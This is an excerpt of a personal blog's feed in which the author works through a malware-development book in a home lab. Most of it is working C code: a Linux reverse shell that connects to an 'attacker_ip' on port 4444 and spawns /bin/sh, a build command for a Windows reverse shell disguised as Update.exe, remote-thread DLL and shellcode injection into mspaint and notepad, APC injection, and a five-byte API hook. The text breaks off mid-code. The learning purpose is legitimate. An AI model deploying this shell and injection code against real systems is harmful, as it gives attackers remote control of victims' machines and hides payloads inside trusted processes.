class="n">process_handle</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">OpenProcess</span><span class="p">(</span><span class="n">PROCESS_ALL_ACCESS</span><span class="p">,</span><span class="w"> </span><span class="n">FALSE</span><span class="p">,</span><span class="w"> </span><span class="n">pi</span><span class="p">.</span><span class="n">dwProcessId</span><span class="p">);</span> <span class="w"> </span><span class="c1">// alloc mem for the payload</span> <span class="w"> </span><span class="n">remote_buffer</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">VirtualAllocEx</span><span class="p">(</span><span class="n">process_handle</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="n">dll_length</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="n">MEM_RESERVE</span><span class="o">|</span><span class="n">MEM_COMMIT</span><span class="p">),</span><span class="w"> </span><span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span> <span class="w"> </span><span class="c1">// copy payload into buffer</span> <span class="w"> </span><span class="n">WriteProcessMemory</span><span class="p">(</span><span class="n">process_handle</span><span class="p">,</span><span class="w"> </span><span class="n">remote_buffer</span><span class="p">,</span><span class="w"> </span><span class="n">maliciousDLL</span><span class="p">,</span><span class="w"> </span><span class="n">dll_length</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">);</span> <span class="w"> </span><span class="c1">// Create a remote thread to start payload</span> <span class="w"> </span><span class="n">remote_thread</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">CreateRemoteThread</span><span class="p">(</span><span class="n">process_handle</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="n">LPTHREAD_START_ROUTINE</span><span class="p">)</span><span class="n">lbuffer</span><span class="p">,</span><span class="w"> </span><span class="n">remote_buffer</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">);</span> <span class="w"> </span><span class="c1">// clean up payload handle</span> <span class="w"> </span><span class="n">CloseHandle</span><span class="p">(</span><span class="n">process_handle</span><span class="p">);</span> <span class="w"> </span><span class="c1">// clean up our decoy process</span> <span class="w"> </span><span class="n">CloseHandle</span><span class="p">(</span><span class="n">pi</span><span class="p">.</span><span class="n">hProcess</span><span class="p">);</span> <span class="w"> </span><span class="n">CloseHandle</span><span class="p">(</span><span class="n">pi</span><span class="p">.</span><span class="n">hThread</span><span class="p">);</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">else</span><span class="p">{</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"CreateProcess failed (%lu).</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div> <p>And again, we have reverse shell, with the actual shellcode now in an <code>update.dll</code> hidden elsewhere instead of in the executable itself: </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-46.webp"/></p> <p>reverse shell</p> <p>The memory view of mspaint.exe shows our C:\\update.dll running:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-47.webp"/></p> <p>custom DLL running inside mspaint.exe</p> <h2 id="apc-injection">APC Injection</h2> <p>The APC injection is very similar to the samples I modified above. It starts a process via C, buit instead starts it in a suspended state. The payload is still copied into the memory as before, however instead of using <code>CreateRemoteThread</code>, a <code>PTHREAD_START_ROUTINE</code> in conjunction with a <code>QueueUserAPC</code> call is used to execute the shell code. Comparison of the difference of proc injection vs APC injection side-by-side, it is very similar.</p> <div class="highlight"><pre><span></span><code><span class="c1">// dll injection</span> <span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">()</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="c1">// Create a 64-bit process:</span> <span class="w"> </span><span class="n">STARTUPINFO</span><span class="w"> </span><span class="n">startupInfo</span><span class="p">;</span> <span class="w"> </span><span class="n">PROCESS_INFORMATION</span><span class="w"> </span><span class="n">processInfo</span><span class="p">;</span> <span class="w"> </span><span class="n">LPVOID</span><span class="w"> </span><span class="n">myPayloadMem</span><span class="p">;</span> <span class="w"> </span><span class="n">SIZE_T</span><span class="w"> </span><span class="n">myPayloadLen</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">myPayload</span><span class="p">);</span> <span class="w"> </span><span class="n">LPCWSTR</span><span class="w"> </span><span class="n">cmd</span><span class="p">;</span> <span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">processHandle</span><span class="p">,</span><span class="w"> </span><span class="n">threadHandle</span><span class="p">;</span> <span class="w"> </span><span class="n">NTSTATUS</span><span class="w"> </span><span class="n">status</span><span class="p">;</span> <span class="w"> </span><span class="n">ZeroMemory</span><span class="p">(</span><span class="o">&amp;</span><span class="n">startupInfo</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">startupInfo</span><span class="p">));</span> <span class="w"> </span><span class="n">ZeroMemory</span><span class="p">(</span><span class="o">&amp;</span><span class="n">processInfo</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">processInfo</span><span class="p">));</span> <span class="w"> </span><span class="n">startupInfo</span><span class="p">.</span><span class="n">cb</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">startupInfo</span><span class="p">);</span> <span class="w"> </span><span class="n">CreateProcessA</span><span class="p">(</span> <span class="w"> </span><span class="s">"C:</span><span class="se">\\</span><span class="s">Windows</span><span class="se">\\</span><span class="s">System32</span><span class="se">\\</span><span class="s">notepad.exe"</span><span class="p">,</span> <span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="n">FALSE</span><span class="p">,</span> <span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">startupInfo</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">processInfo</span> <span class="w"> </span><span class="p">);</span> <span class="w"> </span><span class="n">processHandle</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">processInfo</span><span class="p">.</span><span class="n">hProcess</span><span class="p">;</span> <span class="w"> </span><span class="c1">// Allocate memory for payload</span> <span class="w"> </span><span class="n">myPayloadMem</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">VirtualAllocEx</span><span class="p">(</span><span class="n">processHandle</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="n">myPayloadLen</span><span class="p">,</span> <span class="w"> </span><span class="n">MEM_COMMIT</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">MEM_RESERVE</span><span class="p">,</span><span class="w"> </span><span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span> <span class="w"> </span><span class="c1">// Write payload to allocated memory</span> <span class="w"> </span><span class="n">WriteProcessMemory</span><span class="p">(</span><span class="n">processHandle</span><span class="p">,</span><span class="w"> </span><span class="n">myPayloadMem</span><span class="p">,</span><span class="w"> </span><span class="n">myPayload</span><span class="p">,</span><span class="w"> </span><span class="n">myPayloadLen</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">);</span> <span class="w"> </span><span class="n">threadHandle</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">CreateRemoteThread</span><span class="p">(</span><span class="n">process_handle</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="n">LPTHREAD_START_ROUTINE</span><span class="p">)</span><span class="n">myPayloadMem</span><span class="w"> </span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div> <div class="highlight"><pre><span></span><code><span class="c1">//apc injection</span> <span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">()</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="c1">// Create a 64-bit process:</span> <span class="w"> </span><span class="n">STARTUPINFO</span><span class="w"> </span><span class="n">startupInfo</span><span class="p">;</span> <span class="w"> </span><span class="n">PROCESS_INFORMATION</span><span class="w"> </span><span class="n">processInfo</span><span class="p">;</span> <span class="w"> </span><span class="n">LPVOID</span><span class="w"> </span><span class="n">myPayloadMem</span><span class="p">;</span> <span class="w"> </span><span class="n">SIZE_T</span><span class="w"> </span><span class="n">myPayloadLen</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">myPayload</span><span class="p">);</span> <span class="w"> </span><span class="n">LPCWSTR</span><span class="w"> </span><span class="n">cmd</span><span class="p">;</span> <span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">processHandle</span><span class="p">,</span><span class="w"> </span><span class="n">threadHandle</span><span class="p">;</span> <span class="w"> </span><span class="n">NTSTATUS</span><span class="w"> </span><span class="n">status</span><span class="p">;</span> <span class="w"> </span><span class="n">ZeroMemory</span><span class="p">(</span><span class="o">&amp;</span><span class="n">startupInfo</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">startupInfo</span><span class="p">));</span> <span class="w"> </span><span class="n">ZeroMemory</span><span class="p">(</span><span class="o">&amp;</span><span class="n">processInfo</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">processInfo</span><span class="p">));</span> <span class="w"> </span><span class="n">startupInfo</span><span class="p">.</span><span class="n">cb</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">startupInfo</span><span class="p">);</span> <span class="w"> </span><span class="n">CreateProcessA</span><span class="p">(</span> <span class="w"> </span><span class="s">"C:</span><span class="se">\\</span><span class="s">Windows</span><span class="se">\\</span><span class="s">System32</span><span class="se">\\</span><span class="s">notepad.exe"</span><span class="p">,</span> <span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="n">FALSE</span><span class="p">,</span> <span class="w"> </span><span class="n">CREATE_SUSPENDED</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">startupInfo</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">processInfo</span> <span class="w"> </span><span class="p">);</span> <span class="w"> </span><span class="c1">// Allow time to start/initialize.</span> <span class="w"> </span><span class="n">WaitForSingleObject</span><span class="p">(</span><span class="n">processInfo</span><span class="p">.</span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="mi">50000</span><span class="p">);</span> <span class="w"> </span><span class="n">processHandle</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">processInfo</span><span class="p">.</span><span class="n">hProcess</span><span class="p">;</span> <span class="w"> </span><span class="n">threadHandle</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">processInfo</span><span class="p">.</span><span class="n">hThread</span><span class="p">;</span> <span class="w"> </span><span class="c1">// Allocate memory for payload</span> <span class="w"> </span><span class="n">myPayloadMem</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">VirtualAllocEx</span><span class="p">(</span><span class="n">processHandle</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="n">myPayloadLen</span><span class="p">,</span> <span class="w"> </span><span class="n">MEM_COMMIT</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">MEM_RESERVE</span><span class="p">,</span><span class="w"> </span><span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span> <span class="w"> </span><span class="c1">// Write payload to allocated memory</span> <span class="w"> </span><span class="n">WriteProcessMemory</span><span class="p">(</span><span class="n">processHandle</span><span class="p">,</span><span class="w"> </span><span class="n">myPayloadMem</span><span class="p">,</span><span class="w"> </span><span class="n">myPayload</span><span class="p">,</span><span class="w"> </span><span class="n">myPayloadLen</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">);</span> <span class="w"> </span><span class="c1">// Inject into the suspended thread.</span> <span class="w"> </span><span class="n">PTHREAD_START_ROUTINE</span><span class="w"> </span><span class="n">apcRoutine</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">PTHREAD_START_ROUTINE</span><span class="p">)</span><span class="n">myPayloadMem</span><span class="p">;</span> <span class="w"> </span><span class="n">QueueUserAPC</span><span class="p">((</span><span class="n">PAPCFUNC</span><span class="p">)</span><span class="n">apcRoutine</span><span class="p">,</span><span class="w"> </span><span class="n">threadHandle</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="n">ULONG_PTR</span><span class="p">)</span><span class="nb">NULL</span><span class="p">);</span> <span class="w"> </span><span class="c1">// Resume the suspended thread</span> <span class="w"> </span><span class="n">ResumeThread</span><span class="p">(</span><span class="n">threadHandle</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div> <h2 id="api-hooking">API Hooking</h2> <p>I did not re-create these examples, as they were simple message box manipulations. The example for API hooking uses a five-byte hook to overwrite the call with a <code>JMP</code> to the custom code, and then execute the custom code.</p> <p>The original function call address is calculated. Then using <code>memcpy</code>, <code>\xE9</code> for <code>JMP</code> is loaded into memory along with the offset for the address of the modified function address. Using a new function, a separate library is then loaded and called instead. </p> <p>In the example, <code>(originalCatFunc)("meow-squeak-tweet!!!")</code> is called instead of the intended <code>(originalCatFunc)("meow-meow")</code>.</p> <div class="highlight"><pre><span></span><code><span class="c1">//excerpt of the C example code</span> <span class="kt">int</span><span class="w"> </span><span class="kr">__stdcall</span><span class="w"> </span><span class="n">myModifiedCatFunction</span><span class="p">(</span><span class="n">LPCTSTR</span><span class="w"> </span><span class="n">modifiedMessage</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">HINSTANCE</span><span class="w"> </span><span class="n">petDll</span><span class="p">;</span> <span class="w"> </span><span class="n">OriginalCatFunction</span><span class="w"> </span><span class="n">originalCatFunc</span><span class="p">;</span> <span class="w"> </span><span class="c1">// unhook the function: restore the original bytes</span> <span class="w"> </span><span class="n">WriteProcessMemory</span><span class="p">(</span><span class="n">GetCurrentProcess</span><span class="p">(),</span><span class="w"> </span><span class="p">(</span><span class="n">LPVOID</span><span class="p">)</span><span class="n">hookedFunctionAddress</span><span class="p">,</span><span class="w"> </span><span class="n">originalBytes</span><span class="p">,</span><span class="w"> </span><span class="mi">5</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">);</span> <span class="w"> </span><span class="c1">// load the original function and modify the message</span> <span class="w"> </span><span class="n">petDll</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">LoadLibrary</span><span class="p">(</span><span class="s">"pet.dll"</span><span class="p">);</span> <span class="w"> </span><span class="n">originalCatFunc</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">OriginalCatFunction</span><span class="p">)</span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">petDll</span><span class="p">,</span><span class="w"> </span><span class="s">"Cat"</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="p">(</span><span class="n">originalCatFunc</span><span class="p">)(</span><span class="s">"meow-squeak-tweet!!!"</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// logic for installing the hook</span> <span class="kt">void</span><span class="w"> </span><span class="n">installMyHook</span><span class="p">()</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">HINSTANCE</span><span class="w"> </span><span class="n">hLib</span><span class="p">;</span> <span class="w"> </span><span class="n">VOID</span><span class="w"> </span><span class="o">*</span><span class="n">myModifiedFuncAddress</span><span class="p">;</span> <span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="o">*</span><span class="n">relativeOffset</span><span class="p">;</span> <span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">source</span><span class="p">;</span> <span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">destination</span><span class="p">;</span> <span class="w"> </span><span class="n">CHAR</span><span class="w"> </span><span class="n">patch</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">{</span><span class="mi">0</span><span class="p">};</span> <span class="w"> </span><span class="c1">// obtain the memory address of the original Cat function</span> <span class="w"> </span><span class="n">hLib</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">LoadLibraryA</span><span class="p">(</span><span class="s">"pet.dll"</span><span class="p">);</span> <span class="w"> </span><span class="n">hookedFunctionAddress</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">hLib</span><span class="p">,</span><span class="w"> </span><span class="s">"Cat"</span><span class="p">);</span> <span class="w"> </span><span class="c1">// save the first 5 bytes into originalBytes buffer</span> <span class="w"> </span><span class="n">ReadProcessMemory</span><span class="p">(</span><span class="n">GetCurrentProcess</span><span class="p">(),</span><span class="w"> </span><span class="p">(</span><span class="n">LPCVOID</span><span class="p">)</span><span class="n">hookedFunctionAddress</span><span class="p">,</span><span class="w"> </span><span class="n">originalBytes</span><span class="p">,</span><span class="w"> </span><span class="mi">5</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">);</span> <span class="w"> </span><span class="c1">// overwrite the first 5 bytes with a jump to myModifiedCatFunction</span> <span class="w"> </span><span class="n">myModifiedFuncAddress</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">&amp;</span><span class="n">myModifiedCatFunction</span><span class="p">;</span> <span class="w"> </span><span class="c1">// calculate the relative offset for the jump</span> <span class="w"> </span><span class="n">source</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">DWORD</span><span class="p">)</span><span class="n">hookedFunctionAddress</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">5</span><span class="p">;</span> <span class="w"> </span><span class="n">destination</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">DWORD</span><span class="p">)</span><span class="n">myModifiedFuncAddress</span><span class="p">;</span> <span class="w"> </span><span class="n">relativeOffset</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">DWORD</span><span class="w"> </span><span class="o">*</span><span class="p">)(</span><span class="n">destination</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">source</span><span class="p">);</span> <span class="w"> </span><span class="c1">// \xE9 is the opcode for a jump instruction</span> <span class="w"> </span><span class="n">memcpy</span><span class="p">(</span><span class="n">patch</span><span class="p">,</span><span class="w"> </span><span class="s">"</span><span class="se">\xE9</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="mi">1</span><span class="p">);</span> <span class="w"> </span><span class="n">memcpy</span><span class="p">(</span><span class="n">patch</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">relativeOffset</span><span class="p">,</span><span class="w"> </span><span class="mi">4</span><span class="p">);</span> <span class="w"> </span><span class="n">WriteProcessMemory</span><span class="p">(</span><span class="n">GetCurrentProcess</span><span class="p">(),</span><span class="w"> </span><span class="p">(</span><span class="n">LPVOID</span><span class="p">)</span><span class="n">hookedFunctionAddress</span><span class="p">,</span><span class="w"> </span><span class="n">patch</span><span class="p">,</span><span class="w"> </span><span class="mi">5</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">);</span> <span class="p">}</span> </code></pre></div> <p>This could be utilized to intercept a library call and replace it with our own. I think this, in conjunction with DLL hijacking could be beneficial. If a compromised DLL is loaded before the legitimate DLL, it could have similar code to above to make an application perform operations that were not original intended. I think in terms of the sample code, it defeats the purpose a bit to have the overwrite in the same app as the regular function call, but it is just for learning purposes.</p>2025-01-18T20:57:43-05:002025-01-18T20:57:43-05:00Eric Turnertag:blog.ericturner.it,2025-01-18:/2025/01/18/malware-dev-chapter-01/

<p>I recently picked several new books from Packt, including <a href="https://www.packtpub.com/en-us/product/malware-development-for-ethical-hackers-9781801810173">Malware Development for Ethical Hackers</a>. This book aims to demonstrate some of the techniques seen in malware, and showcase writing similar samples using C/C++ for both Windows and Linux operating systems. </p> <p>My codebase as I work through this book can …</p>

<p>I recently picked several new books from Packt, including <a href="https://www.packtpub.com/en-us/product/malware-development-for-ethical-hackers-9781801810173">Malware Development for Ethical Hackers</a>. This book aims to demonstrate some of the techniques seen in malware, and showcase writing similar samples using C/C++ for both Windows and Linux operating systems. </p> <p>My codebase as I work through this book can be found on my GitHub, <a href="https://github.com/EricTurner3/cybersecurity/tree/main/Malware_Development">here</a>.</p> <h1 id="reverse-shells">Reverse Shells</h1> <p>The first examples dive into creating reverse shells.</p> <h2 id="linux-reverse-shell">Linux Reverse Shell</h2> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-41.webp"/></p> <p>My compiled reverse shell for linux.</p> <p>It worked! The book does not actually talk about compiling or executing the first example for linux, but I went ahead with <code>gcc</code> to compile and then execute the program. I added some additional comments to my code for helping me (and others) in what some of the calls are doing. I have programmed for over a decade at this point, but I only had a brief stent with C related programming back during college, and nothing involving networking.</p> <div class="highlight"><pre><span></span><code><span class="cm">/*</span> <span class="cm"> Linux-Only Reverse Shell</span> <span class="cm"> 18 Jan 2025</span> <span class="cm"> Eric</span> <span class="cm"> To build: gcc rev_shell.c</span> <span class="cm">*/</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdio.h&gt;</span><span class="c1"> // C standard input/output</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;unistd.h&gt;</span><span class="c1"> // POSIX OS API</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;netinet/ip.h&gt;</span><span class="c1"> // Internet Address Family</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;arpa/inet.h&gt;</span><span class="c1"> // defs for internet operations</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;sys/socket.h&gt;</span><span class="c1"> // sockets</span> <span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">(){</span> <span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="o">*</span><span class="w"> </span><span class="n">attacker_ip</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"10.0.2.15"</span><span class="p">;</span> <span class="w"> </span><span class="c1">// build address / port structure</span> <span class="w"> </span><span class="c1">// https://learn.microsoft.com/en-us/windows/win32/api/ws2def/ns-ws2def-sockaddr_in</span> <span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="nc">sockaddr_in</span><span class="w"> </span><span class="n">target_address</span><span class="p">;</span> <span class="w"> </span><span class="n">target_address</span><span class="p">.</span><span class="n">sin_family</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">AF_INET</span><span class="p">;</span><span class="w"> </span><span class="c1">// internet</span> <span class="w"> </span><span class="n">target_address</span><span class="p">.</span><span class="n">sin_port</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">htons</span><span class="p">(</span><span class="mi">4444</span><span class="p">);</span><span class="w"> </span><span class="c1">// convert port to binary</span> <span class="w"> </span><span class="c1">// https://www.ibm.com/docs/en/zos/3.1.0?topic=lf-inet-aton-convert-internet-address-format-from-text-binary</span> <span class="w"> </span><span class="n">inet_aton</span><span class="p">(</span><span class="n">attacker_ip</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">target_address</span><span class="p">.</span><span class="n">sin_addr</span><span class="p">);</span><span class="w"> </span><span class="c1">// convert string address into binary</span> <span class="w"> </span><span class="c1">// create socket</span> <span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">socket_file_descriptor</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">socket</span><span class="p">(</span><span class="n">AF_INET</span><span class="p">,</span><span class="w"> </span><span class="n">SOCK_STREAM</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">);</span> <span class="w"> </span><span class="c1">// connect</span> <span class="w"> </span><span class="n">connect</span><span class="p">(</span><span class="n">socket_file_descriptor</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="k">struct</span><span class="w"> </span><span class="nc">sockaddr</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">target_address</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">target_address</span><span class="p">));</span> <span class="w"> </span><span class="c1">// link stdinput 0, stdoutput 1, stderror 2 to socket</span> <span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">index</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="n">index</span><span class="w"> </span><span class="o">&lt;</span><span class="w"> </span><span class="mi">3</span><span class="p">;</span><span class="w"> </span><span class="n">index</span><span class="o">++</span><span class="p">){</span> <span class="w"> </span><span class="n">dup2</span><span class="p">(</span><span class="n">socket_file_descriptor</span><span class="p">,</span><span class="w"> </span><span class="n">index</span><span class="p">);</span><span class="w"> </span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="c1">// spawn shell</span> <span class="w"> </span><span class="n">execve</span><span class="p">(</span><span class="s">"/bin/sh"</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div> <h2 id="windows-reverse-shell">Windows Reverse Shell</h2> <p>Similar concept but using win32 API calls instead. <code>gcc</code> also cannot be used as a compiler while building on linux, but instead a <code>mingw</code> compiler to cross-compile for Windows.</p> <div class="highlight"><pre><span></span><code>$<span class="w"> </span>i686-w64-mingw32-g++<span class="w"> </span>rev_shell_windows.c<span class="w"> </span>-o<span class="w"> </span>Update.exe<span class="w"> </span>-lws2_32<span class="w"> </span>-s<span class="w"> </span>-ffunction-sections<span class="w"> </span>-fdata-sections<span class="w"> </span>-Wno-write-strings<span class="w"> </span>-fno-exceptions<span class="w"> </span>-fmerge-all-constants<span class="w"> </span>-static-libstdc++<span class="w"> </span>-static-libgcc<span class="w"> </span>-fpermissive </code></pre></div> <p>This behemoth of a command</p> <ul> <li><code>-lws2_32</code> loads the ws2_32 library</li> <li><code>-s</code> strips the symbol table and reloc info</li> <li><code>-ffunction-sections</code> places each function in its own section</li> <li><code>-fdata-sections</code> places each global variable in its own section</li> <li><code>-Wno-write-strings</code> suppresses warnings for writing string literals</li> <li><code>-Fno-exceptions</code> disables exception handling support</li> <li><code>-fmerge-all-constants</code> merges identical constants to reduce size</li> <li><code>-static-libstdc++</code> includes a static link of libstdc++</li> <li><code>-static-libgcc</code> includes a static link of libgcc</li> <li><code>-fpermissive</code> allows compiler to be more permissive when running into issues</li> </ul> <p>I had to reconfigure my two linux / windows VMs to be able to properly communicate using a new NAT network with DHCP on <code>10.0.3.1/24</code>. With the appropriate IP addresses configured for each box, and the code given this new network adapter IP, the reverse shell is successful: </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-42.webp"/></p> <p>Python Web Server used to get the file onto the windows VM. Execution confirms a reverse shell in bottom left terminal.</p> <div class="highlight"><pre><span></span><code><span class="cm">/*</span> <span class="cm"> Windows-Only Reverse Shell</span> <span class="cm"> 18 Jan 2025</span> <span class="cm"> Eric</span> <span class="cm"> To build: i686-w64-mingw32-g++ 01_reverse_shell_windows.c -o Update.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive</span> <span class="cm">*/</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;winsock2.h&gt;</span><span class="c1"> // Sockets https://learn.microsoft.com/en-us/windows/win32/api/winsock2/</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdio.h&gt;</span><span class="c1"> // C standard input/output</span> <span class="cp">#pragma comment(lib, "w2_32") </span><span class="c1">// tells linker to use ws2_32.lib </span> <span class="c1">//variables</span> <span class="n">WSADATA</span><span class="w"> </span><span class="n">socketData</span><span class="p">;</span> <span class="n">SOCKET</span><span class="w"> </span><span class="n">mainSocket</span><span class="p">;</span> <span class="k">struct</span><span class="w"> </span><span class="nc">sockaddr_in</span><span class="w"> </span><span class="n">connectionAddress</span><span class="p">;</span> <span class="n">STARTUPINFO</span><span class="w"> </span><span class="n">startupInfo</span><span class="p">;</span><span class="w"> </span><span 